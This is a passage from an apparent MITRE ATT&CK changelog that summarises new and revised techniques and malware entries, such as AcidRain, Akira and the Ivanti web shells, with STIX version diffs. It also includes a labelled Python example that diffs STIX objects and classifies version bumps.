external_references |  | {'source_name': 'mitd_checkpoint_research', 'description': 'Makkaveev, S. (2018, August 12). Man-in-the-Disk: Android Apps Exposed via External Storage. Retrieved October 31, 2023.', 'url': 'https://research.checkpoint.com/androids-man-in-the-disk/'}

[T1635] Steal Application Access Token

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX Field | Old value | New value
modified | 2023-03-20 18:53:52.292000+00:00 | 2023-12-26 19:17:13.294000+00:00
x_mitre_attack_spec_version | 3.1.0 | 3.2.0
x_mitre_version | 1.1 | 1.2

[T1422] System Network Configuration Discovery

Current version: 2.4

Version changed from: 2.3 → 2.4


Old Description
Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of operating systems they access or through information discovery of remote systems.

On Android, details of onboard network interfaces are accessible to apps through the `java.net.NetworkInterface` class.(Citation: NetworkInterface) Previously, the Android `TelephonyManager` class could be used to gather telephony-related device identifiers, information such as the IMSI, IMEI, and phone number. However, starting with Android 10, only preloaded, carrier, the default SMS, or device and profile owner applications can access the telephony-related device identifiers.(Citation: TelephonyManager)

On iOS, gathering network configuration information is not possible without root access.

Adversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1422) during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do next.

New Description
Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of devices they access or through information discovery of remote systems.

Adversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1422) during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do next.

On Android, details of onboard network interfaces are accessible to apps through the `java.net.NetworkInterface` class.(Citation: NetworkInterface) Previously, the Android `TelephonyManager` class could be used to gather telephony-related device identifiers, information such as the IMSI, IMEI, and phone number. However, starting with Android 10, only preloaded, carrier, the default SMS, or device and profile owner applications can access the telephony-related device identifiers.(Citation: TelephonyManager)

On iOS, gathering network configuration information is not possible without root access.

Adversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1422) during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do next.
Details
values_changed
STIX Field | Old value | New value
modified | 2023-03-20 18:50:32.697000+00:00 | 2024-02-20 23:35:22.949000+00:00
description | Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of operating systems they access or through information discovery of remote systems. On Android, details of onboard network interfaces are accessible to apps through the `java.net.NetworkInterface` class.(Citation: NetworkInterface) Previously, the Android `TelephonyManager` class could be used to gather telephony-related device identifiers, information such as the IMSI, IMEI, and phone number. However, starting with Android 10, only preloaded, carrier, the default SMS, or device and profile owner applications can access the telephony-related device identifiers.(Citation: TelephonyManager) On iOS, gathering network configuration information is not possible without root access. Adversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1422) during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do next. | Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of devices they access or through information discovery of remote systems. Adversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1422) during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do next. On Android, details of onboard network interfaces are accessible to apps through the `java.net.NetworkInterface` class.(Citation: NetworkInterface) Previously, the Android `TelephonyManager` class could be used to gather telephony-related device identifiers, information such as the IMSI, IMEI, and phone number. However, starting with Android 10, only preloaded, carrier, the default SMS, or device and profile owner applications can access the telephony-related device identifiers.(Citation: TelephonyManager) On iOS, gathering network configuration information is not possible without root access. Adversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1422) during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do next.
x_mitre_attack_spec_version | 3.1.0 | 3.2.0
x_mitre_version | 2.3 | 2.4

ics-attack

New Techniques

[T0895] Autorun Image

Current version: 1.0

Description: Adversaries may leverage AutoRun functionality or scripts to execute malicious code. Devices configured to enable AutoRun functionality or legacy operating systems may be susceptible to abuse of these features to run malicious code stored on various forms of removable media (i.e., USB, Disk Images [.ISO]). Commonly, AutoRun or AutoPlay are disabled in many operating system configurations to mitigate against this technique. If a device is configured to enable AutoRun or AutoPlay, adversaries may execute code on the device by mounting the removable media to the device, either through physical or virtual means. This may be especially relevant for virtual machine environments where disk images may be dynamically mapped to a guest system on a hypervisor. An example could include an adversary gaining access to a hypervisor through the management interface to modify a virtual machine’s hardware configuration. They could then deploy an ISO image with a malicious AutoRun script to cause the virtual machine to automatically execute the code contained on the disk image. This would enable the execution of malicious code within a virtual machine without needing any prior remote access to that system.


[T0894] System Binary Proxy Execution

Current version: 1.0

Description: Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed, or otherwise trusted, binaries. Binaries used in this technique are often Microsoft-signed files, indicating that they have been either downloaded from Microsoft or are already native in the operating system. (Citation: LOLBAS Project) Binaries signed with trusted digital certificates can typically execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files or commands. Similarly, on Linux systems adversaries may abuse trusted binaries such as split to proxy execution of malicious commands. (Citation: split man page)(Citation: GTFO split) Adversaries may abuse application binaries installed on a system for proxy execution of malicious code or domain-specific commands. These commands could be used to target local resources on the device or networked devices within the environment through defined APIs ([Execution through API](https://attack.mitre.org/techniques/T0871)) or application-specific programming languages (e.g., MicroSCADA SCIL). Application binaries may be signed by the developer or generally trusted by the operators, analysts, and monitoring tools accustomed to the environment. These applications may be developed and/or directly provided by the device vendor to enable configuration, management, and operation of their devices without many alternatives. Adversaries may seek to target these trusted application binaries to execute or send commands without the development of custom malware. For example, adversaries may target a SCADA server binary which has the existing ability to send commands to substation devices, such as through IEC 104 command messages. Proxy execution may still require the development of custom tools to hook into the application binary’s execution.

Minor Version Changes

[T0802] Automated Collection

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_deprecated |  | False
x_mitre_detection |  |
values_changed
STIX Field | Old value | New value
modified | 2023-10-13 17:57:04.179000+00:00 | 2024-04-05 16:34:58.587000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.2.0
x_mitre_version | 1.0 | 1.1

[T0840] Network Connection Enumeration

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX Field | Old value | New value
modified | 2023-10-13 17:57:13.131000+00:00 | 2024-03-29 14:04:50.569000+00:00
x_mitre_attack_spec_version | 3.1.0 | 3.2.0
x_mitre_version | 1.1 | 1.2

Patches

[T0893] Data from Local System

Current version: 1.0

Details
values_changed
STIX Field | Old value | New value
modified | 2023-10-13 17:57:13.921000+00:00 | 2024-04-09 20:51:03.049000+00:00
x_mitre_attack_spec_version | 3.1.0 | 3.2.0

Software

enterprise-attack

New Software

[S1125] AcidRain

Current version: 1.0

Description: [AcidRain](https://attack.mitre.org/software/S1125) is an ELF binary targeting modems and routers using MIPS architecture.(Citation: AcidRain JAGS 2022) [AcidRain](https://attack.mitre.org/software/S1125) is associated with the ViaSat KA-SAT communication outage that took place during the initial phases of the 2022 full-scale invasion of Ukraine. Analysis indicates overlap with another network device-targeting malware, VPNFilter, associated with [Sandworm Team](https://attack.mitre.org/groups/G0034).(Citation: AcidRain JAGS 2022) US and European government sources linked [AcidRain](https://attack.mitre.org/software/S1125) to Russian government entities, while Ukrainian government sources linked [AcidRain](https://attack.mitre.org/software/S1125) specifically to [Sandworm Team](https://attack.mitre.org/groups/G0034).(Citation: AcidRain State Department 2022)(Citation: Vincens AcidPour 2024)


[S1129] Akira

Current version: 1.0

Description: [Akira](https://attack.mitre.org/software/S1129) ransomware, written in C++, is most prominently (but not exclusively) associated with the ransomware-as-a-service entity [Akira](https://attack.mitre.org/groups/G1024).(Citation: Kersten Akira 2023)


[S1118] BUSHWALK

Current version: 1.0

Description: [BUSHWALK](https://attack.mitre.org/software/S1118) is a web shell written in Perl that was inserted into the legitimate querymanifest.cgi file on compromised Ivanti Connect Secure VPNs during [Cutting Edge](https://attack.mitre.org/campaigns/C0029).(Citation: Mandiant Cutting Edge Part 2 January 2024)(Citation: Mandiant Cutting Edge Part 3 February 2024)


[S1105] COATHANGER

Current version: 1.0

Description: [COATHANGER](https://attack.mitre.org/software/S1105) is a remote access tool (RAT) targeting FortiGate networking appliances. First used in 2023 in targeted intrusions against military and government entities in the Netherlands along with other victims, [COATHANGER](https://attack.mitre.org/software/S1105) was disclosed in early 2024, with a high confidence assessment linking this malware to a state-sponsored entity in the People's Republic of China. [COATHANGER](https://attack.mitre.org/software/S1105) is delivered after gaining access to a FortiGate device, with in-the-wild observations linked to exploitation of CVE-2022-42475. The name [COATHANGER](https://attack.mitre.org/software/S1105) is based on a unique string in the malware used to encrypt configuration files on disk: “She took his coat and hung it up”.(Citation: NCSC-NL COATHANGER Feb 2024)


[S1096] Cheerscrypt

Current version: 1.0

Description: [Cheerscrypt](https://attack.mitre.org/software/S1096) is a ransomware that was developed by [Cinnamon Tempest](https://attack.mitre.org/groups/G1021) and has been used in attacks against ESXi and Windows environments since at least 2022. [Cheerscrypt](https://attack.mitre.org/software/S1096) was derived from the leaked [Babuk](https://attack.mitre.org/software/S0638) source code and has infrastructure overlaps with deployments of Night Sky ransomware, which was also derived from [Babuk](https://attack.mitre.org/software/S0638).(Citation: Sygnia Emperor Dragonfly October 2022)(Citation: Trend Micro Cheerscrypt May 2022)


[S1111] DarkGate

Current version: 1.0

Description: [DarkGate](https://attack.mitre.org/software/S1111) first emerged in 2018 and has evolved into an initial access and data gathering tool associated with various criminal cyber operations. Written in Delphi and named "DarkGate" by its author, [DarkGate](https://attack.mitre.org/software/S1111) is associated with credential theft, cryptomining, cryptotheft, and pre-ransomware actions.(Citation: Ensilo Darkgate 2018) DarkGate use increased significantly starting in 2022 and is under active development by its author, who provides it as a Malware-as-a-Service offering.(Citation: Trellix Darkgate 2023)


[S1120] FRAMESTING

Current version: 1.0

Description: [FRAMESTING](https://attack.mitre.org/software/S1120) is a Python web shell that was used during [Cutting Edge](https://attack.mitre.org/campaigns/C0029) to embed into an Ivanti Connect Secure Python package for command execution.(Citation: Mandiant Cutting Edge Part 2 January 2024)


[S1117] GLASSTOKEN

Current version: 1.0

Description: [GLASSTOKEN](https://attack.mitre.org/software/S1117) is a custom web shell used by threat actors during [Cutting Edge](https://attack.mitre.org/campaigns/C0029) to execute commands on compromised Ivanti Secure Connect VPNs.(Citation: Volexity Ivanti Zero-Day Exploitation January 2024)


[S1097] HUI Loader

Current version: 1.0

Description: [HUI Loader](https://attack.mitre.org/software/S1097) is a custom DLL loader that has been used since at least 2015 by China-based threat groups including [Cinnamon Tempest](https://attack.mitre.org/groups/G1021) and [menuPass](https://attack.mitre.org/groups/G0045) to deploy malware on compromised hosts. [HUI Loader](https://attack.mitre.org/software/S1097) has been observed in campaigns loading [SodaMaster](https://attack.mitre.org/software/S0627), [PlugX](https://attack.mitre.org/software/S0013), [Cobalt Strike](https://attack.mitre.org/software/S0154), [Komplex](https://attack.mitre.org/software/S0162), and several strains of ransomware.(Citation: SecureWorks BRONZE STARLIGHT Ransomware Operations June 2022)


[S1119] LIGHTWIRE

Current version: 1.0

Description: [LIGHTWIRE](https://attack.mitre.org/software/S1119) is a web shell written in Perl that was used during [Cutting Edge](https://attack.mitre.org/campaigns/C0029) to maintain access and enable command execution by embedding into the legitimate compcheckresult.cgi component of Ivanti Secure Connect VPNs.(Citation: Mandiant Cutting Edge Part 2 January 2024)(Citation: Mandiant Cutting Edge January 2024)


[S1121] LITTLELAMB.WOOLTEA

Current version: 1.0

Description: [LITTLELAMB.WOOLTEA](https://attack.mitre.org/software/S1121) is a backdoor that was used by UNC5325 during [Cutting Edge](https://attack.mitre.org/campaigns/C0029) to deploy malware on targeted Ivanti Connect Secure VPNs and to establish persistence across system upgrades and patches.(Citation: Mandiant Cutting Edge Part 3 February 2024)


[S1101] LoFiSe

Current version: 1.0

Description: [LoFiSe](https://attack.mitre.org/software/S1101) has been used by [ToddyCat](https://attack.mitre.org/groups/G1022) since at least 2023 to identify and collect files of interest on targeted systems.(Citation: Kaspersky ToddyCat Check Logs October 2023)


[S1122] Mispadu

Current version: 1.0

Description: [Mispadu](https://attack.mitre.org/software/S1122) is a banking trojan written in Delphi that was first observed in 2019 and uses a Malware-as-a-Service (MaaS) business model.(Citation: ESET Security Mispadu Facebook Ads 2019)(Citation: SCILabs Malteiro 2021) This malware is operated, managed, and sold by the [Malteiro](https://attack.mitre.org/groups/G1026) cybercriminal group.(Citation: SCILabs Malteiro 2021) [Mispadu](https://attack.mitre.org/software/S1122) has mainly been used to target victims in Brazil and Mexico, and has also had confirmed operations throughout Latin America and Europe.(Citation: SCILabs Malteiro 2021)(Citation: SCILabs URSA/Mispadu Evolution 2023)(Citation: Segurança Informática URSA Sophisticated Loader 2020)


[S1106] NGLite

Current version: 1.0

Description: [NGLite](https://attack.mitre.org/software/S1106) is a backdoor Trojan that is only capable of running commands received through its C2 channel. While the capabilities are standard for a backdoor, NGLite uses a novel C2 channel that leverages a decentralized network based on the legitimate NKN to communicate between the backdoor and the actors.(Citation: NGLite Trojan)


[S1107] NKAbuse

Current version: 1.0

Description: [NKAbuse](https://attack.mitre.org/software/S1107) is a Go-based, multi-platform malware abusing NKN (New Kind of Network) technology for data exchange between peers, functioning as a potent implant, and equipped with both flooder and backdoor capabilities.(Citation: NKAbuse BC)(Citation: NKAbuse SL)


[S1100] Ninja

Current version: 1.0

Description: [Ninja](https://attack.mitre.org/software/S1100) is a malware developed in C++ that has been used by [ToddyCat](https://attack.mitre.org/groups/G1022) to penetrate networks and control remote systems since at least 2020. [Ninja](https://attack.mitre.org/software/S1100) is possibly part of a post exploitation toolkit exclusively used by [ToddyCat](https://attack.mitre.org/groups/G1022) and allows multiple operators to work simultaneously on the same machine. [Ninja](https://attack.mitre.org/software/S1100) has been used against government and military entities in Europe and Asia and observed in specific infection chains being deployed by [Samurai](https://attack.mitre.org/software/S1099).(Citation: Kaspersky ToddyCat June 2022)


[S1109] PACEMAKER

Current version: 1.0

Description: [PACEMAKER](https://attack.mitre.org/software/S1109) is a credential stealer that was used by [APT5](https://attack.mitre.org/groups/G1023) as early as 2020 including activity against US Defense Industrial Base (DIB) companies.(Citation: Mandiant Pulse Secure Zero-Day April 2021)


[S1123] PITSTOP

Current version: 1.0

Description: [PITSTOP](https://attack.mitre.org/software/S1123) is a backdoor that was deployed on compromised Ivanti Connect Secure VPNs during [Cutting Edge](https://attack.mitre.org/campaigns/C0029) to enable command execution and file read/write.(Citation: Mandiant Cutting Edge Part 3 February 2024)


[S1108] PULSECHECK

Current version: 1.0

Description: [PULSECHECK](https://attack.mitre.org/software/S1108) is a web shell written in Perl that was used by [APT5](https://attack.mitre.org/groups/G1023) as early as 2020 including against Pulse Secure VPNs at US Defense Industrial Base (DIB) companies.(Citation: Mandiant Pulse Secure Zero-Day April 2021)


[S1102] Pcexter

Current version: 1.0

Description: [Pcexter](https://attack.mitre.org/software/S1102) is an uploader that has been used by [ToddyCat](https://attack.mitre.org/groups/G1022) since at least 2023 to exfiltrate stolen files.(Citation: Kaspersky ToddyCat Check Logs October 2023)


[S1113] RAPIDPULSE

Current version: 1.0

Description: [RAPIDPULSE](https://attack.mitre.org/software/S1113) is a web shell that exists as a modification to a legitimate Pulse Secure file that has been used by [APT5](https://attack.mitre.org/groups/G1023) since at least 2021.(Citation: Mandiant Pulse Secure Update May 2021)


[S1110] SLIGHTPULSE

Current version: 1.0

Description: [SLIGHTPULSE](https://attack.mitre.org/software/S1110) is a web shell that was used by [APT5](https://attack.mitre.org/groups/G1023) as early as 2020 including against Pulse Secure VPNs at US Defense Industrial Base (DIB) entities.(Citation: Mandiant Pulse Secure Zero-Day April 2021)


[S1104] SLOWPULSE

Current version: 1.0

Description: [SLOWPULSE](https://attack.mitre.org/software/S1104) is a malware that was used by [APT5](https://attack.mitre.org/groups/G1023) as early as 2020 including against U.S. Defense Industrial Base (DIB) companies. [SLOWPULSE](https://attack.mitre.org/software/S1104) has several variants and can modify legitimate Pulse Secure VPN files in order to log credentials and bypass single and two-factor authentication flows.(Citation: Mandiant Pulse Secure Zero-Day April 2021)


[S1112] STEADYPULSE

Current version: 1.0

Description: [STEADYPULSE](https://attack.mitre.org/software/S1112) is a web shell that infects targeted Pulse Secure VPN servers through modification of a legitimate Perl script that was used as early as 2020 including in activity against US Defense Industrial Base (DIB) entities.(Citation: Mandiant Pulse Secure Zero-Day April 2021)


[S1099] Samurai

Current version: 1.0

Description: [Samurai](https://attack.mitre.org/software/S1099) is a passive backdoor that has been used by [ToddyCat](https://attack.mitre.org/groups/G1022) since at least 2020. [Samurai](https://attack.mitre.org/software/S1099) allows arbitrary C# code execution and is used with multiple modules for remote administration and lateral movement.(Citation: Kaspersky ToddyCat June 2022)


[S1124] SocGholish

Current version: 1.0

Description: [SocGholish](https://attack.mitre.org/software/S1124) is a JavaScript-based loader malware that has been used since at least 2017. It has been observed in use against multiple sectors globally for initial access, primarily through drive-by-downloads masquerading as software updates. SocGholish is operated by [Mustard Tempest](https://attack.mitre.org/groups/G1020) and its access has been sold to groups including [Indrik Spider](https://attack.mitre.org/groups/G0119) for downloading secondary RAT and ransomware payloads.(Citation: SentinelOne SocGholish Infrastructure November 2022)(Citation: SocGholish-update)(Citation: Red Canary SocGholish March 2024)(Citation: Secureworks Gold Prelude Profile)


[S1116] WARPWIRE

Current version: 1.0

Description: [WARPWIRE](https://attack.mitre.org/software/S1116) is a JavaScript credential stealer that targets plaintext passwords and usernames for exfiltration and that was used during [Cutting Edge](https://attack.mitre.org/campaigns/C0029) to target Ivanti Connect Secure VPNs.(Citation: Mandiant Cutting Edge January 2024)(Citation: Mandiant Cutting Edge Part 2 January 2024)


[S1115] WIREFIRE

Current version: 1.0

Description: [WIREFIRE](https://attack.mitre.org/software/S1115) is a web shell written in Python that exists as trojanized logic to the visits.py component of Ivanti Connect Secure VPN appliances. [WIREFIRE](https://attack.mitre.org/software/S1115) was used during [Cutting Edge](https://attack.mitre.org/campaigns/C0029) for downloading files and command execution.(Citation: Mandiant Cutting Edge January 2024)


[S1114] ZIPLINE

Current version: 1.0

Description: [ZIPLINE](https://attack.mitre.org/software/S1114) is a passive backdoor that was used during [Cutting Edge](https://attack.mitre.org/campaigns/C0029) on compromised Secure Connect VPNs for reverse shell and proxy functionality.(Citation: Mandiant Cutting Edge January 2024)

Major Version Changes

[S0534] Bazar

Current version: 2.0

Version changed from: 1.2 → 2.0

Details
values_changed
STIX Field | Old value | New value
modified | 2022-09-29 20:41:20.065000+00:00 | 2023-12-04 19:42:13.073000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.2.0
x_mitre_version | 1.2 | 2.0
iterable_item_added
STIX Field | Old value | New value
external_references |  | {'source_name': 'Bazaloader', 'description': '(Citation: Microsoft Ransomware as a Service)'}
external_references |  | {'source_name': 'Microsoft Ransomware as a Service', 'description': 'Microsoft. (2022, May 9). Ransomware as a service: Understanding the cybercrime gig economy and how to protect yourself. Retrieved March 10, 2023.', 'url': 'https://www.microsoft.com/en-us/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/'}
x_mitre_aliases |  | Bazaloader

[S0659] Diavol

Current version: 2.0

Version changed from: 1.0 → 2.0


Old Description
[Diavol](https://attack.mitre.org/software/S0659) is a ransomware variant first observed in June 2021 that is capable of prioritizing file types to encrypt based on a pre-configured list of extensions defined by the attacker. [Diavol](https://attack.mitre.org/software/S0659) has been deployed by [Bazar](https://attack.mitre.org/software/S0534) and is thought to have potential ties to [Wizard Spider](https://attack.mitre.org/groups/G0102).(Citation: Fortinet Diavol July 2021)(Citation: FBI Flash Diavol January 2022)(Citation: DFIR Diavol Ransomware December 2021)

New Description
[Diavol](https://attack.mitre.org/software/S0659) is a ransomware variant first observed in June 2021 that is capable of prioritizing file types to encrypt based on a pre-configured list of extensions defined by the attacker. The [Diavol](https://attack.mitre.org/software/S0659) Ransomware-as-a Service (RaaS) program is managed by [Wizard Spider](https://attack.mitre.org/groups/G0102) and it has been observed being deployed by [Bazar](https://attack.mitre.org/software/S0534).(Citation: Fortinet Diavol July 2021)(Citation: FBI Flash Diavol January 2022)(Citation: DFIR Diavol Ransomware December 2021)(Citation: Microsoft Ransomware as a Service)
Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-15 00:59:33.522000+00:002023-12-04 20:15:22.258000+00:00
description[Diavol](https://attack.mitre.org/software/S0659) is a ransomware variant first observed in June 2021 that is capable of prioritizing file types to encrypt based on a pre-configured list of extensions defined by the attacker. [Diavol](https://attack.mitre.org/software/S0659) has been deployed by [Bazar](https://attack.mitre.org/software/S0534) and is thought to have potential ties to [Wizard Spider](https://attack.mitre.org/groups/G0102).(Citation: Fortinet Diavol July 2021)(Citation: FBI Flash Diavol January 2022)(Citation: DFIR Diavol Ransomware December 2021)[Diavol](https://attack.mitre.org/software/S0659) is a ransomware variant first observed in June 2021 that is capable of prioritizing file types to encrypt based on a pre-configured list of extensions defined by the attacker. The [Diavol](https://attack.mitre.org/software/S0659) Ransomware-as-a Service (RaaS) program is managed by [Wizard Spider](https://attack.mitre.org/groups/G0102) and it has been observed being deployed by [Bazar](https://attack.mitre.org/software/S0534).(Citation: Fortinet Diavol July 2021)(Citation: FBI Flash Diavol January 2022)(Citation: DFIR Diavol Ransomware December 2021)(Citation: Microsoft Ransomware as a Service)
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.02.0
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Microsoft Ransomware as a Service', 'description': 'Microsoft. (2022, May 9). Ransomware as a service: Understanding the cybercrime gig economy and how to protect yourself. Retrieved March 10, 2023.', 'url': 'https://www.microsoft.com/en-us/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/'}
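
The split into "Major Version Changes" and "Minor Version Changes", and the values_changed / dictionary_item_added / dictionary_item_removed / iterable_item_added buckets in each entry, are the output of a field-by-field diff of the STIX objects in the two releases, ranked by how x_mitre_version moved. The following Python is an added example and not MITRE's changelog tooling: it diffs two STIX-style software objects into the same buckets and classifies the version bump. The property names are the real ATT&CK/STIX ones; the two objects, their alias and citation values, and the example.invalid URLs are constructed sample data.

```python
"""Classify an ATT&CK STIX object change the way this changelog does.

Added example, not MITRE's own changelog generator. It diffs two STIX-style
software objects into the buckets used on this page (dictionary_item_added,
dictionary_item_removed, values_changed, iterable_item_added) and ranks the
x_mitre_version bump as major or minor. Field names are real ATT&CK/STIX
property names; the two objects below are constructed sample data.
"""
from typing import Any

# Constructed "before" and "after" snapshots of one fictional software entry.
OLD_OBJECT: dict[str, Any] = {
    "type": "malware",
    "name": "ExampleTool",
    "modified": "2022-09-29T20:41:20.065Z",
    "x_mitre_version": "1.2",
    "x_mitre_attack_spec_version": "2.1.0",
    "x_mitre_aliases": ["ExampleTool"],
    "x_mitre_contributors": ["Example Contributor"],
    "external_references": [
        {"source_name": "Example Report 2021", "url": "https://example.invalid/2021"},
    ],
}
NEW_OBJECT: dict[str, Any] = {
    "type": "malware",
    "name": "ExampleTool",
    "modified": "2023-12-04T19:42:13.073Z",
    "x_mitre_version": "2.0",
    "x_mitre_attack_spec_version": "3.2.0",
    "x_mitre_deprecated": False,  # new key -> dictionary_item_added
    "x_mitre_aliases": ["ExampleTool", "ExampleLoader"],  # -> iterable_item_added
    "external_references": [  # second citation -> iterable_item_added
        {"source_name": "Example Report 2021", "url": "https://example.invalid/2021"},
        {"source_name": "Example Report 2022", "url": "https://example.invalid/2022"},
    ],
    # x_mitre_contributors dropped -> dictionary_item_removed
}


def parse_version(version: str) -> tuple[int, int]:
    """ATT&CK object versions are MAJOR.MINOR strings. Compare them as integer
    pairs: as floats, "1.12" would sort before "1.9", but it is the later one."""
    major, minor = version.split(".")
    return int(major), int(minor)


def version_bump(old_version: str, new_version: str) -> str:
    """'major', 'minor', 'none', or 'downgrade' (a downgrade should never
    appear in a release and is worth flagging rather than silently binning)."""
    old = parse_version(old_version)
    new = parse_version(new_version)
    if new == old:
        return "none"
    if new < old:
        return "downgrade"
    return "major" if new[0] > old[0] else "minor"


def diff_stix_object(old: dict[str, Any], new: dict[str, Any]) -> dict[str, dict]:
    """Field-by-field diff into the buckets used by this changelog. Only
    non-empty buckets are returned."""
    report: dict[str, dict] = {
        "dictionary_item_added": {},
        "dictionary_item_removed": {},
        "values_changed": {},
        "iterable_item_added": {},
        "iterable_item_removed": {},
    }
    for key in sorted(old.keys() | new.keys()):
        if key not in old:
            report["dictionary_item_added"][key] = new[key]
        elif key not in new:
            report["dictionary_item_removed"][key] = old[key]
        elif isinstance(old[key], list) and isinstance(new[key], list):
            # List-valued fields (aliases, external_references, contributors):
            # report membership changes. An item edited in place shows up as
            # one removed and one added rather than as a values_changed path.
            added = [item for item in new[key] if item not in old[key]]
            removed = [item for item in old[key] if item not in new[key]]
            if added:
                report["iterable_item_added"][key] = added
            if removed:
                report["iterable_item_removed"][key] = removed
        elif old[key] != new[key]:
            report["values_changed"][key] = (old[key], new[key])
    return {bucket: changes for bucket, changes in report.items() if changes}


def changelog_entry(old: dict[str, Any], new: dict[str, Any]) -> dict[str, Any]:
    """One entry as this page presents it: name, bump class, and details."""
    return {
        "name": new["name"],
        "bump": version_bump(old["x_mitre_version"], new["x_mitre_version"]),
        "details": diff_stix_object(old, new),
    }


if __name__ == "__main__":
    entry = changelog_entry(OLD_OBJECT, NEW_OBJECT)
    print(f"[{entry['name']}] {entry['bump']} version change")
    for bucket, changes in entry["details"].items():
        print(bucket)
        for field, value in changes.items():
            print(f"  {field}: {value}")
```

The integer-pair comparison in parse_version is the one detail worth carrying into any tooling that consumes these releases: entries such as Cobalt Strike moving from 1.11 to 1.12 sort wrongly if versions are parsed as floats, and a pipeline that keys detection coverage on object versions would then miss the update.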
Minor Version Changes

[S0552] AdFind

Current version: 1.4

Version changed from: 1.3 → 1.4

Details
values_changed
STIX Field | Old value | New value
modified | 2023-08-09 16:50:06.756000+00:00 | 2024-04-04 03:49:04.493000+00:00
x_mitre_attack_spec_version | 3.1.0 | 3.2.0
x_mitre_version | 1.3 | 1.4

[S0504] Anchor

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_deprecated |  | False
values_changed
STIX Field | Old value | New value
modified | 2021-12-15 20:56:24.628000+00:00 | 2023-12-04 20:02:47.052000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.2.0
x_mitre_version | 1.0 | 1.1

[S0456] Aria-body

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_deprecated |  | False
values_changed
STIX Field | Old value | New value
modified | 2021-08-19 17:58:43.342000+00:00 | 2024-04-11 02:58:53.131000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.2.0
x_mitre_version | 1.1 | 1.2

[S0373] Astaroth

Current version: 2.3

Version changed from: 2.2 → 2.3

Details
values_changed
STIX Field | Old value | New value
modified | 2023-11-06 20:12:28.502000+00:00 | 2024-04-11 02:58:17.763000+00:00
x_mitre_version | 2.2 | 2.3

[S0438] Attor

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_deprecated |  | False
values_changed
STIX Field | Old value | New value
modified | 2020-07-07 12:35:11.897000+00:00 | 2024-04-11 02:57:38.076000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.2.0
x_mitre_version | 1.0 | 1.1

[S0347] AuditCred

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_deprecated |  | False
values_changed
STIX Field | Old value | New value
modified | 2020-03-30 14:51:50.371000+00:00 | 2024-04-11 02:57:01.302000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.2.0
x_mitre_version | 1.1 | 1.2

[S0473] Avenger

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_deprecated |  | False
values_changed
STIX Field | Old value | New value
modified | 2020-06-24 17:44:18.663000+00:00 | 2024-04-11 02:56:34.181000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.2.0
x_mitre_version | 1.0 | 1.1

[S1081] BADHATCH

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX Field | Old value | New value
modified | 2023-10-04 16:53:23.530000+00:00 | 2024-04-11 02:55:51.310000+00:00
x_mitre_version | 1.0 | 1.1

[S0017] BISCUIT

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_deprecated |  | False
values_changed
STIX Field | Old value | New value
modified | 2020-03-30 14:57:52.169000+00:00 | 2023-12-26 19:55:54.853000+00:00
external_references[3]['url'] | https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report-appendix.zip | https://www.mandiant.com/sites/default/files/2021-09/mandiant-apt1-report.pdf
x_mitre_attack_spec_version | 2.1.0 | 3.2.0
x_mitre_version | 1.2 | 1.3

[S0520] BLINDINGCAN

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_deprecated |  | False
values_changed
STIX Field | Old value | New value
modified | 2021-03-17 15:55:56.257000+00:00 | 2024-04-11 02:51:38.922000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.2.0
x_mitre_version | 1.0 | 1.1

[S0657] BLUELIGHT

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_deprecated |  | False
values_changed
STIX Field | Old value | New value
modified | 2021-10-15 21:00:52.016000+00:00 | 2024-04-11 02:49:24.851000+00:00
